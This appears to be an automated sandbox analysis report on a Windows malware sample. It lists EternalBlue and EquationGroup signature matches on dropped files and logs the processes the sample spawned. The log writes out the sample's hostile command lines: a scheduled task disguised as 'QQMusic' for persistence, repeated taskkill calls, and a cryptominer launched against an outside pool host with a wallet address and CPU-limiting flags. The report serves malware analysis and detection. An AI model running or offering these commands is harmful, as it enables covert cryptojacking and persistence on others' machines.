Source: C:\ProgramData\etchCore-0.x64.dll, type: DROPPED Matched rule: EquationGroup_Toolset_Apr17_Architouch_Eternalsynergy_Smbtouch date = 2017-04-15, hash3 = 108243f61c53f00f8f1adcf67c387a8833f1a2149f063dd9ef29205c90a3c30a, hash2 = 92c6a9e648bfd98bbceea3813ce96c6861487826d6b2c3d462debae73ed25b34, author = Florian Roth, description = Detects EquationGroup Tool - April Leak, reference = https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 444979a2387530c8fbbc5ddb075b15d6a4717c3435859955f37ebc0f40a4addc
Source: C:\ProgramData\svchostlong.exe, type: DROPPED Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: C:\ProgramData\etchCore-0.x86.dll, type: DROPPED Matched rule: EquationGroup_Toolset_Apr17_Architouch_Eternalsynergy_Smbtouch date = 2017-04-15, hash3 = 108243f61c53f00f8f1adcf67c387a8833f1a2149f063dd9ef29205c90a3c30a, hash2 = 92c6a9e648bfd98bbceea3813ce96c6861487826d6b2c3d462debae73ed25b34, author = Florian Roth, description = Detects EquationGroup Tool - April Leak, reference = https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 444979a2387530c8fbbc5ddb075b15d6a4717c3435859955f37ebc0f40a4addc
Source: C:\ProgramData\zibe.dll, type: DROPPED Matched rule: EquationGroup_Toolset_Apr17_Architouch_Eternalsynergy_Smbtouch date = 2017-04-15, hash3 = 108243f61c53f00f8f1adcf67c387a8833f1a2149f063dd9ef29205c90a3c30a, hash2 = 92c6a9e648bfd98bbceea3813ce96c6861487826d6b2c3d462debae73ed25b34, author = Florian Roth, description = Detects EquationGroup Tool - April Leak, reference = https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 444979a2387530c8fbbc5ddb075b15d6a4717c3435859955f37ebc0f40a4addc
Source: C:\ProgramData\tibe.dll, type: DROPPED Matched rule: EquationGroup_Toolset_Apr17_Architouch_Eternalsynergy_Smbtouch date = 2017-04-15, hash3 = 108243f61c53f00f8f1adcf67c387a8833f1a2149f063dd9ef29205c90a3c30a, hash2 = 92c6a9e648bfd98bbceea3813ce96c6861487826d6b2c3d462debae73ed25b34, author = Florian Roth, description = Detects EquationGroup Tool - April Leak, reference = https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 444979a2387530c8fbbc5ddb075b15d6a4717c3435859955f37ebc0f40a4addc
Source: C:\ProgramData\tibe.dll, type: DROPPED Matched rule: EquationGroup_Toolset_Apr17__ecwi_ESKE_EVFR_RPC2_2 date = 2017-04-15, hash4 = 5c0896dbafc5d8cc19b1bc7924420b20ed5999ac5bee2cb5a91aada0ea01e337, hash3 = c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674, hash2 = 9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556, author = Florian Roth, description = Detects EquationGroup Tool - April Leak, reference = https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = c4152f65e45ff327dade50f1ac3d3b876572a66c1ce03014f2877cea715d9afd
Source: C:\ProgramData\tibe.dll, type: DROPPED Matched rule: EquationGroup_Toolset_Apr17__EAFU_ecwi_ESKE_EVFR_RPC2_4 date = 2017-04-15, hash5 = 5c0896dbafc5d8cc19b1bc7924420b20ed5999ac5bee2cb5a91aada0ea01e337, hash4 = c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674, hash3 = 9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556, hash2 = c4152f65e45ff327dade50f1ac3d3b876572a66c1ce03014f2877cea715d9afd, author = Florian Roth, description = Detects EquationGroup Tool - April Leak, reference = https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 3e181ca31f1f75a6244b8e72afaa630171f182fbe907df4f8b656cc4a31602f6
Source: C:\ProgramData\tibe.dll, type: DROPPED Matched rule: EquationGroup_Toolset_Apr17__ESKE_RPC2_8 date = 2017-04-15, hash2 = 5c0896dbafc5d8cc19b1bc7924420b20ed5999ac5bee2cb5a91aada0ea01e337, author = Florian Roth, description = Detects EquationGroup Tool - April Leak, reference = https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556
Source: C:\ProgramData\serverlong.xml, type: DROPPED Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: C:\ProgramData\serverlong.exe, type: DROPPED Matched rule: EquationGroup_Toolset_Apr17_Erraticgopher_1_0_1 date = 2017-04-15, hash1 = 3d11fe89ffa14f267391bc539e6808d600e465955ddb854201a1f31a9ded4052, author = Florian Roth, description = Detects EquationGroup Tool - April Leak, reference = https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\ProgramData\serverlong.exe, type: DROPPED Matched rule: EquationGroup_Toolset_Apr17_Doublepulsar_1_3_1 date = 2017-04-15, hash1 = 15ffbb8d382cd2ff7b0bd4c87a7c0bffd1541c2fe86865af445123bc0b770d13, author = Florian Roth, description = Detects EquationGroup Tool - April Leak, reference = https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: C:\ProgramData\serverlong.exe, type: DROPPED Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: C:\ProgramData\etch-0.dll, type: DROPPED Matched rule: EquationGroup_Toolset_Apr17_Architouch_Eternalsynergy_Smbtouch date = 2017-04-15, hash3 = 108243f61c53f00f8f1adcf67c387a8833f1a2149f063dd9ef29205c90a3c30a, hash2 = 92c6a9e648bfd98bbceea3813ce96c6861487826d6b2c3d462debae73ed25b34, author = Florian Roth, description = Detects EquationGroup Tool - April Leak, reference = https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 444979a2387530c8fbbc5ddb075b15d6a4717c3435859955f37ebc0f40a4addc
Source: C:\ProgramData\spread.txt, type: DROPPED Matched rule: INDICATOR_TOOL_EXP_EternalBlue author = ditekSHen, description = Detects Windows executables containing EternalBlue explitation artifacts
Source: C:\ProgramData\SMB.exe Code function: String function: 0133D810 appears 31 times
Source: C:\ProgramData\SMB.exe Code function: String function: 0133CDF0 appears 37 times
Source: C:\ProgramData\SMB.exe Code function: String function: 0133CEC0 appears 53 times
Source: C:\ProgramData\SMB.exe Code function: 37_2_01327070: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW, 37_2_01327070
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process token adjusted: Security Jump to behavior
Source: SecuriteInfo.com.Variant.Mikey.113879.32606.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.spre.expl.evad.mine.winEXE@125/61@2/2
Source: C:\ProgramData\SMB.exe File read: C:\Windows\win.ini Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_00405C60 GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,CreateFileA,WriteFile,FindCloseChangeNotification, 0_2_00405C60
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe File read: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe "C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe /F
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe /F
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ipconfig /flushdns
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /flushdns
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\ProgramData\cywkjq.exe C:\ProgramData\cywkjq.exe -o stratum+tcp://auto.c3pool.org:19999 -u 457ysMKkjHgdjMHnKMmJF6Hw8Z5E1hXzVYKkKayti6vS78PQ1n2WaeBNU6miDoBQEMbicrdCDa1yu1UqHunwrcNb9kVwSCF -p jq --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\ProgramData\cywkjq.exe C:\ProgramData\cywkjq.exe -o stratum+tcp://auto.c3pool.org:19999 -u 457ysMKkjHgdjMHnKMmJF6Hw8Z5E1hXzVYKkKayti6vS78PQ1n2WaeBNU6miDoBQEMbicrdCDa1yu1UqHunwrcNb9kVwSCF -p jq --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\ProgramData\cywkjq.exe C:\ProgramData\cywkjq.exe -o stratum+tcp://auto.c3pool.org:19999 -u 457ysMKkjHgdjMHnKMmJF6Hw8Z5E1hXzVYKkKayti6vS78PQ1n2WaeBNU6miDoBQEMbicrdCDa1yu1UqHunwrcNb9kVwSCF -p jq --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\ProgramData\cywkjq.exe C:\ProgramData\cywkjq.exe -o stratum+tcp://auto.c3pool.org:19999 -u 457ysMKkjHgdjMHnKMmJF6Hw8Z5E1hXzVYKkKayti6vS78PQ1n2WaeBNU6miDoBQEMbicrdCDa1yu1UqHunwrcNb9kVwSCF -p jq --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe "C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\ProgramData\SMB.exe C:\ProgramData\SMB.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\ProgramData\cywkjq.exe C:\ProgramData\cywkjq.exe -o stratum+tcp://auto.c3pool.org:19999 -u 457ysMKkjHgdjMHnKMmJF6Hw8Z5E1hXzVYKkKayti6vS78PQ1n2WaeBNU6miDoBQEMbicrdCDa1yu1UqHunwrcNb9kVwSCF -p jq --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\ProgramData\cywkjq.exe C:\ProgramData\cywkjq.exe -o stratum+tcp://auto.c3pool.org:19999 -u 457ysMKkjHgdjMHnKMmJF6Hw8Z5E1hXzVYKkKayti6vS78PQ1n2WaeBNU6miDoBQEMbicrdCDa1yu1UqHunwrcNb9kVwSCF -p jq --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\ProgramData\cywkjq.exe C:\ProgramData\cywkjq.exe -o stratum+tcp://auto.c3pool.org:19999 -u 457ysMKkjHgdjMHnKMmJF6Hw8Z5E1hXzVYKkKayti6vS78PQ1n2WaeBNU6miDoBQEMbicrdCDa1yu1UqHunwrcNb9kVwSCF -p jq --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\ProgramData\SMB.exe C:\ProgramData\SMB.exe
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe "C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe"
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe "C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im cywkjq.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\ProgramData\cywkjq.exe C:\ProgramData\cywkjq.exe -o stratum+tcp://auto.c3pool.org:19999 -u 457ysMKkjHgdjMHnKMmJF6Hw8Z5E1hXzVYKkKayti6vS78PQ1n2WaeBNU6miDoBQEMbicrdCDa1yu1UqHunwrcNb9kVwSCF -p jq --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks /create /sc minute /mo 1 /tn "QQMusic" /tr C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe /F Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ipconfig /flushdns Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\ProgramData\cywkjq.exe C:\ProgramData\cywkjq.exe -o stratum+tcp://auto.c3pool.org:19999 -u 457ysMKkjHgdjMHnKMmJF6Hw8Z5E1hXzVYKkKayti6vS78PQ1n2WaeBNU6miDoBQEMbicrdCDa1yu1UqHunwrcNb9kVwSCF -p jq --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\ProgramData\cywkjq.exe C:\ProgramData\cywkjq.exe -o stratum+tcp://auto.c3pool.org:19999 -u 457ysMKkjHgdjMHnKMmJF6Hw8Z5E1hXzVYKkKayti6vS78PQ1n2WaeBNU6miDoBQEMbicrdCDa1yu1UqHunwrcNb9kVwSCF -p jq --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\ProgramData\cywkjq.exe C:\ProgramData\cywkjq.exe -o stratum+tcp://auto.c3pool.org:19999 -u 457ysMKkjHgdjMHnKMmJF6Hw8Z5E1hXzVYKkKayti6vS78PQ1n2WaeBNU6miDoBQEMbicrdCDa1yu1UqHunwrcNb9kVwSCF -p jq --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\ProgramData\cywkjq.exe C:\ProgramData\cywkjq.exe -o stratum+tcp://auto.c3pool.org:19999 -u 457ysMKkjHgdjMHnKMmJF6Hw8Z5E1hXzVYKkKayti6vS78PQ1n2WaeBNU6miDoBQEMbicrdCDa1yu1UqHunwrcNb9kVwSCF -p jq --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\ProgramData\SMB.exe C:\ProgramData\SMB.exe Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\ProgramData\cywkjq.exe C:\ProgramData\cywkjq.exe -o stratum+tcp://auto.c3pool.org:19999 -u 457ysMKkjHgdjMHnKMmJF6Hw8Z5E1hXzVYKkKayti6vS78PQ1n2WaeBNU6miDoBQEMbicrdCDa1yu1UqHunwrcNb9kVwSCF -p jq --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\ProgramData\cywkjq.exe C:\ProgramData\cywkjq.exe -o stratum+tcp://auto.c3pool.org:19999 -u 457ysMKkjHgdjMHnKMmJF6Hw8Z5E1hXzVYKkKayti6vS78PQ1n2WaeBNU6miDoBQEMbicrdCDa1yu1UqHunwrcNb9kVwSCF -p jq --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\ProgramData\SMB.exe C:\ProgramData\SMB.exe Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\ProgramData\cywkjq.exe C:\ProgramData\cywkjq.exe -o stratum+tcp://auto.c3pool.org:19999 -u 457ysMKkjHgdjMHnKMmJF6Hw8Z5E1hXzVYKkKayti6vS78PQ1n2WaeBNU6miDoBQEMbicrdCDa1yu1UqHunwrcNb9kVwSCF -p jq --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im cywkjq.exe&&exit Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Process created: unknown unknown Jump to behavior
